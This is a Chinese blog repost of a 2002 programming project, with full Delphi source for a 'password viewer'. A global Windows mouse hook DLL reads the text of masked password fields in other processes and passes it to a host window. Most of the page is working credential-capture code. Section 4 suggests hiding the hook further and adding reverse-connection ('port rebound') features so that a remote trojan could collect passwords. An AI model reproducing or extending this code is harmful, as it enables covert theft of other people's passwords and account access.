Windows文本框星号密码查看器
生活随笔
收集整理的這篇文章主要介紹了
Windows文本框星号密码查看器
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
Windows文本框星號密碼查看器
本人2002的學習作品
作者:成曉旭
1、? 設計原理:注冊一個系統級鼠標掛鉤,通過監測系統鼠標所在Windows窗口來獲取密碼,成功獲取密碼之后,通過發送自定義的Windows系統消息,到宿主程序。
2、? Hook動態鏈接庫設計原理:采用Windows Hook技術[鼠標掛鉤],切入遠程進程內部,并監測當前系統鼠標所在位置的當然窗口句柄(通過Windows APIWindowFromPoint()),獲取窗口句柄之后,判斷當然窗口是否為文本框,并進一步判斷是否為密碼框,當發現是密碼輸入框時,當此窗口發送WM_GETTEXT消息,獲取密碼。成功獲取密碼之后,發現自定義的WM_COPYDATA消息到宿主程序;
具體實現步驟簡介:
1.? 設置系統鼠標掛鉤:
??????? hkMouseHook := SetWindowsHookEx(WH_MOUSE,@CXX_MouseHookProc,hInstance,0);
2.? 注銷系統鼠標掛鉤:
??????? UnHookWindowsHookEx(hkMouseHook);
3.? 監測當然窗口及窗口風格判斷:
??????? MousePos := pMhs.pt;
??? wnd := WindowFromPoint(pmhs.pt);
??? style := GetWindowLong(wnd,GWL_STYLE);
??? if (style and ES_PASSWORD) = ES_PASSWORD then
??? begin
??? ??????? //發現密碼窗口
??? end;
4.? 向密碼框獲取密碼串:
??????? SendMessage(wnd,WM_GETTEXT,256,Integer(@MouseTitle[0]));
5.? 發送自定義消息到宿主程序:
????????????? GetMem(pmi,sizeof(TMouseInfo));
??????? pmi.MouseX := pt.X;
??????? pmi.MouseY := pt.Y;
??????? pmi.MouseTitle := pwd;
??????? GetMem(pcds,sizeof(TCopyDataStruct));
??????? pcds.dwData := 9910;
??????? pcds.cbData := sizeof(TMouseInfo);
??????? pcds.lpData := pmi;
??????? SendMessage(hDec,WM_COPYDATA,0,LPARAM(pcds));
3、? 宿主程序設計原理:我的宿主程序是自己學習Windows SDK開發時作品,采用純SDK實現。SDK的編程不用廢話了吧。在這個工具程序中,只需要在系統消息處理方法中,增加一個對WM_COPYDATA的攔截及處理過程就可能了。
case uMsg of
??? WM_COPYDATA:
??? begin
??????? CXX_ReceiveCopyData(uMsg);
??? end;
??????? ……
end;
4、? 應用技術提點:這個是本人在2002年學習Microsoft Windows SDK編程技術時的學習作品。當然,有興趣的話,你完全可以將其Hook進一步進行隱藏,并為其增加“端口反彈”或者“半連接”功能,宿主程序可以是自己的遠程XXXXXX,哈哈,這樣發布出來的話,想知道的東西就多了……
5、 完整源碼代碼:
1.? Hook鼠標掛鉤部分:
??
...{?????產品名稱:?????Windows 密碼工具[Window98/NT/2000/XP]
?????功能描述:?????截取Windows密碼編輯框中的密碼串
????????????????????采用純粹的SDK開發
????????????????????能捕捉windows98/NT/2000/XP的密碼框中的"*"密碼
?????開發平臺:?????Windows2000?+?Delphi6?+?MSDN?+?SDK
?????開發者:???????成曉旭
?????版權所有:?????成曉旭
?????模塊設計者:???成曉旭
?????設計思路:?????采用Windows?Hook技術[鼠標掛鉤],切入遠程進程內部,
????????????????????再發送WM_GETTEXT消息截取密碼,最后用SendMessage發送
????????????????????WM_COPYDATA消息自定義的密碼信息結構體到目標窗口,以
????????????????????顯示或處理Hook?DLL所截取的遠程進程的密碼.
?????開始時間:?????2002年3月4日
?????完成時間:?????2002年5月24日[最終實現]
?????備????注:?????此工具是本人在2002年開發的第二個軟件
????????????????????本工具在2000年6月份左右曾實現過一個Windows98下的
????????????????????密碼截取工具,兩年以來,我一直沒有放棄過實現Windows
????????????????????操作系統下的所有密碼的截取,如此,終于實現了兩年以來
????????????????????未曾實現的截取WindowsNT系列的密碼.[2002/05/24]
????????????????????以后的路還很長:WindowNT系列的當前用戶登錄密碼、
????????????????????內存長駐的其它密碼等等.
}
unit?MouseHook;
interface
uses
????Messages,Windows;//,SysUtils;
var
????hkMouseHook:HHook;
????ProcSafelyExit:Pointer;
????uCXXMsg:UINT;
????procedure???DllEntryProc(ul_reason_for_call:DWORD);
????procedure???SetupHook(fSet:boolean);stdcall;export;
????function????CXX_MouseHookProc(iCode:integer;wParam:WPARAM;lParam:LPARAM):LRESULT;stdcall;export;
????procedure???AutoUnInstallHook();far;
implementation
uses?DataStruct;
procedure?CXX_SendCopyData(pt:TPoint;pwd:TMTitle);
var
????pcds:PCopyDataStruct;
????pmi:PMouseInfo;
????hDec:THandle;
begin
????hDec:=Findwindow(Nil,'WM_COPYDATA接收端');
????if?hDec?=?0?then
????begin
????????MessageBox(0,'數據接收窗口沒有找到,程序拒絕發送WM_COPYDATA消息!','提示',MB_OK?or?MB_ICONWARNING);
????????Exit;
????end;
????try
????????GetMem(pmi,sizeof(TMouseInfo));
????????pmi.MouseX?:=?pt.X;
????????pmi.MouseY?:=?pt.Y;
????????pmi.MouseTitle?:=?pwd;
????????GetMem(pcds,sizeof(TCopyDataStruct));
????????pcds.dwData?:=?9910;
????????pcds.cbData?:=?sizeof(TMouseInfo);
????????pcds.lpData?:=?pmi;
????????SendMessage(hDec,WM_COPYDATA,0,LPARAM(pcds));
????????//PostMessage(hDec,WM_COPYDATA,Handle,LPARAM(pcds));
????finally
????????FreeMem(pmi);
????????FreeMem(pcds);
????end;
end;
function?CXX_MouseHookProc(iCode:integer;wParam:WPARAM;lParam:LPARAM):LRESULT;stdcall;export;
var
????pMhs:PMOUSEHOOKSTRUCT;
????wnd:HWND;
????style:LongInt;
????MousePos:TPoint;
????MouseTitle:TMTitle;
begin
????if?iCode?=?HC_ACTION?then
????begin
????????FillChar(MouseTitle,255,0);
????????pMhs?:=?PMOUSEHOOKSTRUCT(lParam);
????????MousePos?:=?pMhs.pt;
????????wnd?:=?WindowFromPoint(pmhs.pt);
????????style?:=?GetWindowLong(wnd,GWL_STYLE);
????????if?(style?and?ES_PASSWORD)?=?ES_PASSWORD?then
????????begin
????????????SendMessage(wnd,WM_GETTEXT,256,Integer(@MouseTitle[0]));
????????????//發送截取的信息[]
????????????CXX_SendCopyData(MousePos,MouseTitle);
????????end;
????end;
????Result?:=?CallNextHookEx(hkMouseHook,iCode,wParam,lParam);
end;
procedure?SetupHook(fSet:boolean);stdcall;export;
begin
????if?fSet?then
????begin
????????if?hkMouseHook?<>?0?then?Exit;
????????????hkMouseHook?:=?SetWindowsHookEx(WH_MOUSE,@CXX_MouseHookProc,hInstance,0);
????????//if?hkMouseHook?<>?0?then
????????//????MessageBox(0,'鼠標掛鉤安裝成功!!!','掛鉤提示',MB_ICONINFORMATION?or?MB_OK)
????????//else
????????//????MessageBox(0,'鼠標掛鉤安裝失敗!','掛鉤提示',MB_ICONWARNING?or?MB_OK);
????end
????else
????begin
???????if?hkMouseHook?<>?0?then
????????begin
????????????UnHookWindowsHookEx(hkMouseHook);
????????????hkMouseHook?:=?0;
????????????//if?hkMouseHook?=?0?then
????????????//????MessageBox(0,'鼠標掛鉤撤消成功!!!','掛鉤提示',MB_ICONINFORMATION?or?MB_OK)
????????????//else
????????????//????MessageBox(0,'鼠標掛鉤撤消失敗!','掛鉤提示',MB_ICONWARNING?or?MB_OK);
????????end;
????end;
end;
procedure???DllEntryProc(ul_reason_for_call:DWORD);
begin
...{
????if?ul_reason_for_call?=?DLL_PROCESS_ATTACH?then
????begin
????????MessageBox(0,'DLL_PROCESS_ATTACH','MouseDll?Hint',MB_OK?or?MB_ICONINFORMATION);
????????//uCXXMsg?:=?RegisterWindowMessage(SELF_MESSAGE_NAME);
????end
????else?if?ul_reason_for_call?=?DLL_PROCESS_DETACH?then
????begin
????????MessageBox(0,'DLL_PROCESS_DETACH','MouseDll?Hint',MB_OK?or?MB_ICONINFORMATION);
????end;
????}
end;
procedure?AutoUnInstallHook();
begin
?????if?hkMouseHook?<>?0?then
??????????SetupHook(False);
?????ExitProc?:=?ProcSafelyExit;
end;
end.
?
?
2.? 宿主程序部分:
?
此程序中,還有關于Windows程序資源加載以及窗口背景繪制等技術的演示。
?
...{?????產品名稱:?????Windows 密碼工具
?????功能描述:?????截取Windows密碼編輯框中的密碼串
????????????????????采用純粹的SDK開發
?????開發平臺:?????Windows2000?+?Delphi6?+?MSDN?+?SDK
?????開發者:???????成曉旭
?????版權所有:?????成曉旭
?????模塊設計者:???成曉旭
?????開始時間:?????2002年3月4日
?????完成時間:?????2002年3月4日
?????修改時間1:????2002年3月4日
?????備????注:?????此工具是本人在2002年開發的第二個軟件,
}
program?MouseExe;
uses
??Windows,
??SysUtils,
??Messages,
??Tie_In_MHook?in?'Tie_In_MHook.pas',
??DataStruct?in?'DataStruct.pas';
...{$R?MouseExe.res}
const
????CXX_WND_CLASS?=?'DC_Password';???//主窗口類名
????CXX_WND_CAPTION?=?'Window2000/XP?密碼捕捉工具';
????CXX_PASSKEY?=?'chenxiaoxu';
????MOUSE_MOVE_TIMER?=?WM_USER?+?9910;
????SELF_MESSAGE_NAME?=?'CXX_Test_Window_Message';
var
????hWndMain,???????????????//程序主窗口句柄
????hBtnCheck,???????????????//程序發送按鈕句柄
????hBtnClose,??????????????//程序關閉按鈕句柄
????hStcPos,???????????????//鼠標位置提示
????hStcTitle,???????????????//窗口標題提示
????hEdtPos,????????????????//鼠標當前位置
????hEdtTitle:???????????????//獲取窗口標題
????????????????LongWord;
????hInstMain:??integer;????//程序實例句柄
????hBGBmp?:????HBITMAP;????//主窗口背景圖片句柄
????hCur:???????HICON;
????uCXXMsg:????UINT;
procedure?CXX_SendCopyData();
var
????pcds:PCopyDataStruct;
????pmi:PMouseInfo;
????hDec:THandle;
begin
????hDec:=Findwindow(Nil,'WM_COPYDATA接收端');
????if?hDec?=?0?then
????begin
????????MessageBox(hWndMain,'數據接收窗口沒有找到,程序拒絕發送WM_COPYDATA消息!','提
示',MB_OK?or?MB_ICONWARNING);
????????Exit;
????end;
????//try
????????GetMem(pmi,sizeof(TMouseInfo));
????????pmi.MouseX?:=?10;
????????pmi.MouseY?:=?50;
????????pmi.MouseTitle?:=?'chenxiaoxu';
????????GetMem(pcds,sizeof(TCopyDataStruct));
????????pcds.dwData?:=?9910;
????????pcds.cbData?:=?sizeof(TMouseInfo);
????????pcds.lpData?:=?pmi;
????????SendMessage(hDec,WM_COPYDATA,hWndMain,LPARAM(pcds));
????????//PostMessage(hDec,WM_COPYDATA,Handle,LPARAM(pcds));
????//finally
????????FreeMem(pmi);
????????FreeMem(pcds);
????//end;
end;
procedure?CXX_ReceiveCopyData(Msg:TMessage);
var
????str:string;
begin
????str?:=?IntToStr(PMouseInfo(PCOPYDATASTRUCT(Msg.LParam)^.lpData)^.MouseX);
????str?:=?str?+?IntToStr(PMouseInfo(PCOPYDATASTRUCT(Msg.LParam)^.lpData)^.MouseY);
end;
//繪制窗口位圖背景函數
function?CXX_DrawBGBitmap(fdc:HDC;fBitmap:HBitmap):boolean;
var
????hdcMem:HDC;
????rect:TRect;
????bmp:Bitmap;
????x,y:integer;
begin
//????bmp?:=?nil;
????Result?:=?False;
????//主窗口背景圖片尚未加載,不能繪制窗口背景
????if?fBitmap?=?0?then?Exit;
????//獲取繪圖區域
????GetClientRect(hWndMain,rect);
????//創建兼容內存設備描述表
????hdcMem?:=?CreateCompatibleDC(fdc);
????if?hdcMem?=?0?then?Exit;
????//設置位圖對象
????if?(GetObject(fBitmap,sizeof(Bitmap),@bmp)?=?0)?then?Exit;
????//設置內存設備描述表內容
????if?NOT?Boolean(SelectObject(hdcMem,fBitmap))?then?Exit;
????//繪制窗口背景圖片
????x?:=?0;
????while(x?<=?rect.Right-rect.Left)?do
????begin
????????y?:=?0;
????????while(y?<=?rect.Bottom-rect.Top)?do
????????begin
????????????BitBlt(fdc,x,y,bmp.bmWidth,bmp.bmHeight,hdcMem,0,0,SRCCOPY);
????????????y?:=?y?+?bmp.bmHeight;
????????end;
????????x?:=?x?+?bmp.bmWidth;
????end;
????Result?:=?DeleteDC(hdcMem);
end;
...{
?function?CXX_SetWinCaption():設置窗口對象標題函數
?參數定義:
?????hWnd:???窗口對象句柄
?????pchText:窗口對象標題
}
procedure?CXX_SetWinCaption(hWnd:hWND;pchText:PChar);
begin
????SendMessage(hWnd,WM_SETTEXT,0,Integer(pchText));
????//SetWindowText(hWnd,pchText);
end;
...{
?function?CXX_GetWinCaption():取得按鈕標題函數
?參數定義:
?????hWnd:???按鈕句柄
?????pchText:按鈕標題
}
procedure?CXX_GetWinCaption(hWnd:hWND;pchText:PChar);
begin
????SendMessage(hWnd,WM_GETTEXT,255,Integer(pchText));
end;
procedure?CXX_MouseMoveTimerProc(hWin:HWND;uMsg:UINT;idEvent:UINT;dwTime:DWORD);
begin
????//MessageBox(hWin,'系統時間','提示',0);
end;
function?CXX_SetProgramTimer(fSetTimer:boolean):boolean;
begin
????Result?:=?False;
????if?fSetTimer?then
????begin
????????//if?SetTimer(hWndMain,MOUSE_MOVE_TIMER,3000,@CXX_MouseMoveTimerProc)?<>?0?then
????????if?SetTimer(hWndMain,MOUSE_MOVE_TIMER,100,nil)?<>?0?then
????????????Result?:=?True;
????end
????else
????begin
????????if?KillTimer(hWndMain,MOUSE_MOVE_TIMER)?then
????????????Result?:=?True;
????end;
end;
//主窗口消息回調函數
//function?CXX_MainWindowProc(hWnd,uMsg,wParam,lParam:DWord):LRESULT;stdcall;
function?CXX_MainWindowProc(hWnd:DWord;uMsg:TMessage;wParam,lParam:DWord):LRESULT;stdcall;
var
//????pchPassword:PCHAR;
????dc?:HDC;
????ps:PAINTSTRUCT;
begin
...{
????if?uMsg?=?uCXXMsg?then
????begin
????????MessageBox(hWnd,'自定義消息來了!!!','Hint',0);
????????MessageBox(hWnd,PChar(lParam),'消息內容',0);
????end;
????}
????case?uMsg?of
????WM_COPYDATA:
????begin
????????//MessageBox(hWndMain,'窗口接收WM_COPYDATA消息!','提示',MB_OK?or?MB_ICONWARNING);
????????CXX_ReceiveCopyData(uMsg);
????end;
????WM_CREATE:
????begin
????????uCXXMsg?:=?RegisterWindowMessage(SELF_MESSAGE_NAME);
????end;
????WM_RBUTTONDBLCLK:???//$0206
????????PostQuitMessage(0);
????WM_COMMAND:?????????//$0111
????begin
????????if?lParam?=?hBtnClose??then
????????begin
????????????if?MessageBox(hWnd,PChar('確定要退出【'+CXX_WND_CAPTION+'】嗎?'),'確
認',MB_YESNO?or?MB_ICONQUESTION)?=?IDYES?then
????????????????PostQuitMessage(0);
????????end
????????else?if?lParam?=?hBtnCheck?then
????????begin
????????????//CXX_SetProgramTimer(True);
????????????//PostMessage(HWND_BROADCAST,uCXXMsg,0,0);
????????????//SetupHook(True);
????????????CXX_SendCopyData();
????????end;
????end;
????WM_PAINT:
????begin
????????dc?:=?BeginPaint(hWnd,ps);
???????????if?NOT?CXX_DrawBGBitmap(dc,hBGBmp)?then
????????????MessageBox(hWnd,'繪制主窗口背景失敗呢!','提示',MB_OK?or?MB_ICONWARNING);
????end;
????WM_DESTROY:
????begin
?????????CXX_SetProgramTimer(false);
?????????Halt;???//$0002:
????end;
????end;????//End?of?Case
????Result?:=?DefWindowProc(hWnd,uMsg,wParam,lParam);
end;
//應用程序實例化
function?CXX_InitInstance():boolean;
var
????wndClass:TWndClass;
begin
????hInstMain?:=?hInstance;
????hCur?:=?LoadCursor(hInstMain,'HANDLE');
????if?hCur?=?0?then
????????MessageBox(hWndMain,'加載主窗口背景圖片失敗!!!','提示',MB_OK?or?
MB_ICONWARNING)
????else
????????SetCursor(hCur);
????hBGBmp?:=?LoadBitmap(hInstMain,'BACKBMP');
????if?hBGBmp?=?0?then
????????MessageBox(hWndMain,'加載主窗口背景圖片失敗!!!','提示',MB_OK?or?
MB_ICONWARNING);
????wndClass.cbClsExtra?:=?0;
????wndClass.cbWndExtra?:=?0;
????wndClass.hInstance?:=?hInstMain;
????wndClass.hIcon?:=?0;
????wndClass.hCursor?:=?LoadCursor(0,IDC_HAND);
????wndClass.hbrBackground?:=?CTLCOLOR_EDIT;
????wndClass.lpfnWndProc?:=?@CXX_MainWindowProc;
????wndClass.lpszClassName?:=?CXX_WND_CLASS;
????wndClass.lpszMenuName?:=?nil;
????wndClass.style?:=?CS_DBLCLKS;
????Result?:=?Boolean(RegisterClassA(wndClass));
end;
//主程序函數
procedure?CXX_RunMainProgram();
var
????myMsg:TMsg;
begin
????if?NOT?CXX_InitInstance()?then
????????Exit;
????hWndMain?:=?CreateWindowEx(WS_EX_CLIENTEDGE?or?WS_EX_TOPMOST,
????????????????????????CXX_WND_CLASS,CXX_WND_CAPTION,
????????????????????????WS_VISIBLE?or?WS_SYSMENU?or?WS_MINIMIZEBOX,
????????????????????????0,0,320,150,0,0,hInstMain,nil);
????hStcPos?:=?CreateWindowEx(0,'static','鼠標位置:',
????????????????????????WS_VISIBLE?OR?WS_CHILD,
????????????????????????5,10,80,20,
????????????????????????hWndMain,0,hInstMain,nil);
????hEdtPos?:=?CreateWindowEx(WS_EX_CLIENTEDGE,'Edit','',
????????????????????????WS_VISIBLE?OR?WS_CHILD,
????????????????????????100,10,200,20,
????????????????????????hWndMain,0,hInstMain,nil);
????hStcTitle?:=?CreateWindowEx(0,'static','獲取密碼:',
????????????????????????WS_VISIBLE?OR?WS_CHILD,
????????????????????????5,50,80,20,
????????????????????????hWndMain,0,hInstMain,nil);
????hEdtTitle?:=?CreateWindowEx(WS_EX_CLIENTEDGE,'Edit','',
????????????????????????WS_VISIBLE?OR?WS_CHILD,
????????????????????????100,50,200,20,
????????????????????????hWndMain,0,hInstMain,nil);
????hBtnCheck?:=?CreateWindowEx(WS_EX_STATICEDGE?or?WS_EX_CLIENTEDGE,'Button','發送消息',
????????????????????????WS_VISIBLE?OR?WS_CHILD,
????????????????????????10,85,100,30,
????????????????????????hWndMain,0,hInstMain,nil);
????hBtnClose?:=?CreateWindowEx(WS_EX_STATICEDGE?or?WS_EX_CLIENTEDGE,'Button','退出程序',
????????????????????????WS_VISIBLE?OR?WS_CHILD,
????????????????????????180,85,100,30,
????????????????????????hWndMain,0,hInstMain,nil);
????//主程序函數循環
????while(GetMessage(myMsg,hWndMain,0,0))?do
????begin
????????TranslateMessage(myMsg);
????????DispatchMessage(myMsg);
????end;
end;
begin
????CXX_RunMainProgram();
end.
總結
以上是生活随笔為你收集整理的Windows文本框星号密码查看器的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 如何检查房间里隐藏的摄像机 六种方法解决
- 下一篇: Unicode以及字符集转换